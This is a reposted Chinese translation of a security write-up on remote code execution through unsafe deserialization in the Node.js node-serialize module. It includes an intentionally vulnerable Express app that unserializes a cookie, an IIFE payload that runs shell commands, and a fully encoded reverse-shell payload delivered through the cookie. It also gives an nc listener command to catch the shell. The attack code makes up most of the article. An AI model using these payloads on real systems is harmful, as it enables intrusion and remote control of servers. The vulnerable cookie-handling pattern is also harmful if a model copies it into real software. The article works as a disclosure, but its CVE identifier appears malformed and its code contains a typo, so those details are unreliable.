转载

【漏洞分析】利用Node.js反序列化的漏洞执行远程代码

【漏洞分析】利用Node.js反序列化的漏洞执行远程代码

翻译: 阻圣

预估稿费:100RMB

投稿方式:发送邮件至 linwei#360.cn ,或登陆网页版在线投稿

漏洞介绍

漏洞名称: Exploiting Node.js deserialization bug for Remote Code Execution

漏洞CVE id: CVE-2017-594

漏洞类型: 代码执行

漏洞简介:

不可信的数据传入了unserialize()函数,这导致我们可以通过传递带有立即调用函数表达式(IIFE)的JavaScript对象来实现任意代码执行。

漏洞详情

在Node.js代码审查期间,我碰巧看到了一个序列化/反序列化模块命名为node-serialize。cookie的值来自请求然后被传递到模块提供的unserialize()函数。下面是一个示例的node.js应用程序:

var express = require('express');
var cookieParser = require('cookie-parser');
var escape = require('escape-html');
var serialize = require('node-serialize');
var app = express();
app.use(cookieParser())
app.get('/', function(req, res){
    if (req.cookies.profile) {
        var str = new Buffer(req.cookies.profile,'base64').toStrin();
        var obj = serialize.unserialize(str);
    if (obj.username){
    res.send("Hello " + escape(obj.username));
    }
}else{
res.cookie('profile',"eyJ1c2VybmFtZSI6ImFqaW4iLCJjb3VudHJ5IjoiaW5kaWEiLCJjaXR5Ijo
iYmFuZ2Fsb3JlIn0=",{ maxAge: 900000, httpOnly: true});
}
res.send("Hello World");
});
app.listen(3000);

Java,PHP,Ruby和Python也有着大量的反序列化问题

Understanding PHP Object Injection

Java Deserialization Cheat Sheet

Rails Remote Code Execution Vulnerability Explained

Arbitrary code execution with Python pickles

但是我找不到任何解释反序列化/对象的资源来解释Node.js中的注入BUG。

Building the Payload

我使用node-serialize version 0.0.4进行研究,为了成功利用当不可信数据传递到unserialize()函数时,执行任意代码。创建Payload的最好方法就是使用同一模块的serialize()函数。

我创建了以下JavaScript对象并将其传递给serialize()函数。

var y = {
rce : function(){
require('child_process').exec('ls /', function(error,
stdout, stderr) { console.log(stdout) });
},
}
var serialize = require('node-serialize');
console.log("Serialized: /n" + serialize.serialize(y));

输出如下:

【漏洞分析】利用Node.js反序列化的漏洞执行远程代码

现在我们有一个序列化的字符串,可以通过unserialize()函数进行反序列化,但问题是代码执行不会发生,直到你触发对应于对象的rce属性的函数。后来我想出,我们可以使用JavaScript的立即调用函数表达式(IIFE)来调用该函数。如果我们在函数体之后使用括号(),当对象被创建时,函数将被调用。 它的工作方式类似于C ++中的类构造函数。

代码:

var y = {
rce : function(){
require('child_process').exec('ls /', function(error,
stdout, stderr) { console.log(stdout) });
}(),
}
var serialize = require('node-serialize');
console.log("Serialized: /n" + serialize.serialize(y));

获得以下输出

【漏洞分析】利用Node.js反序列化的漏洞执行远程代码

IIFE工作正常,但序列化失败。所以我试图在以前序列化的字符串的函数体后添加括号()。并将其传递给unserialize()函数,幸运的它成功了。所以我们有Exploit Payload:

{"rce":"_$$ND_FUNC$$_function (){/n /t
require('child_process').exec('ls /', function(error, stdout, stderr) {
console.log(stdout) });/n }()"}

将它传递给unserialize()函数将导致代码执行。

var serialize = require('node-serialize');
var payload = '{"rce":"_$$ND_FUNC$$_function
(){require(/'child_process/').exec(/'ls //',
function(error, stdout, stderr) { console.log(stdout)
});}()"}';
serialize.unserialize(payload);

演示:

【漏洞分析】利用Node.js反序列化的漏洞执行远程代码

现在我们知道我们可以利用node-serialize模块中的unserialize()函数。现在让我们来利用漏洞生成一个反向shell。

Further Exploitation

Web应用程序中的漏洞是它从HTTP请求中读取名为profile的cookie,对cookie值执行base64解码,并将其传递给unserialize()函数。由于cookie是不受信任的输入,攻击者可以制作恶意Cookie值以利用此漏洞。

我使用nodejsshell.py生成反向shell有效负载。

$ python nodejsshell.py 127.0.0.1 1337
[+] LHOST = 127.0.0.1
[+] LPORT = 1337
[+] Encoding
eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,10
5,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,3
2,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,11
5,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,50,55,46,48,46,48,46,
49,34,59,10,80,79,82,84,61,34,49,51,51,55,34,59,10,84,73,77,69,79,85,84,61,34,53,4
8,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103
,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,6
1,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,11
0,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,3
2,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,1
14,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,3
2,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,8
4,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32
,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,3
2,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,
83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,3
2,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,1
04,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114
,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,
32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,11
6,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,11
6,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,1
15,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,
41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,1
02,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,12
3,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68
,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,3
2,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,
46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,
101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,
40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,3
2,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))

现在让我们生成序列化的有效内容,并在函数体后添加括号()。

{"rce":"_$$ND_FUNC$$_function (){
eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101
,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,1
12,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,1
08,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,1
0,72,79,83,84,61,34,49,50,55,46,48,46,48,46,49,34,59,10,80,79,82,84,61,3
4,49,51,51,55,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,1
05,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112
,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,
61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,
116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,
110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105
,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,1
10,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,
125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82
,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,6
1,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,3
2,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,7
9,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,3
2,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,11
2,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,
32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,
67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32
,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,
116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,10
0,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,3
2,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,1
12,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,
104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111
,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32
,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,
115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,3
2,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,
105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117
,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,11
5,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,
84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,
10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}()"}

我们需要执行相同的Base64编码,然后使用Cookie头中的编码Payload向Web服务器发出请求。

【漏洞分析】利用Node.js反序列化的漏洞执行远程代码

现在我们可以使用nc监听一下本地的一个端口:

nc -l 127.0.0.1 1337

演示:

【漏洞分析】利用Node.js反序列化的漏洞执行远程代码

成功利用,反弹一个shell。

演示视频

总结

我们利用了一个反序列化的bug实现了任意代码执行,经验告诉我们,永远不要相信用户的输入。这个漏洞产生的根本原因在于内部使用了eval()反序列化,我在另一个名为serialize-to-js的模块中也发现了一个类似的错误。在该模块中,Node.js中的require()函数在没有IIFE的对象的反序列化期间没有范围,并且它们在内部使用新的函数用于反序列化。我们仍然可以使用稍微复杂的有效载荷来实现代码执行。

【漏洞分析】利用Node.js反序列化的漏洞执行远程代码 【漏洞分析】利用Node.js反序列化的漏洞执行远程代码

本文由 安全客 翻译,转载请注明“转自安全客”,并附上链接。

原文链接:https://www.exploit-db.com/docs/41289.pdf
原文  http://bobao.360.cn/learning/detail/3488.html
正文到此结束
所属分类: 编程技术

热门推荐

相关文章

阿里云首购8折
说给你听

本文目录
随机标签
书籍教程
springboot-demo Java入门教程 bootstrap3 CSS Apache基础教程 php ionic 教程 Python mysql教程 eclipse Ubuntu VPS系统配置 AngularJS 教程 MongoDB教程 Struts2教程 Redis教程 Spring教程 Git教程 Jenkins进阶系列 openfire参考指南 Java设计模式 HBase教程 Maven教程 hibernate教程 Docker 教程 memcached教程 Quartz指南 Hive教程 Ant教程 ANTLR教程 SpringCloud java实例教程 springcloud-demo XStream教程 Hazelcast教程 Elastic-Job-Lite 深入浅出MyBatis SVN教程 ibaties教程 rabittmq教程 solr教程 Hadoop教程 WebService CXF学习 JPA教程 ActiveMQ中文指南 java-demo Java内存模型 dubbo教程 python3-demo Linux入门视频教程
近期评论
  1. 1 Spring Cloud Consul实现选举机制
  2. 2 Spring Boot集成ShedLock实现分布式定时任务
  3. 3 利用oss进行数据库和网站图片备份
  4. 4 Spring Cloud Stream实现数据流处理
  5. 5 Python3访问MySQL数据库快速入门Demo
  6. 6 Github开源项目作者可以免费申请 JetBrains 全家桶
  7. 7 Spring Cloud Vault快速入门Demo
  8. 8 Spring Cloud Gateway快速入门Demo
  9. 9 Spring Cloud Contract快速入门Demo
  10. 10 Spring Cloud Consul快速入门Demo
网站信息
  • 文章总数:82,714 篇
  • 文件总数:284,287 个
  • 标签总数:2,393 个
  • 分类总数:85 个
  • 留言数量:2,560 条
  • 在线人数:686 人
  • 运行天数:4,409天
  • 最后更新:2024年11月22日05点
Loading...

其他链接

关于本站

本站定位:个人技术类博客

本站作用:写博客、记日志、闲聊扯淡鼓捣技术。

问题交流

[HBLOG]公众号 HBLOG HBLOG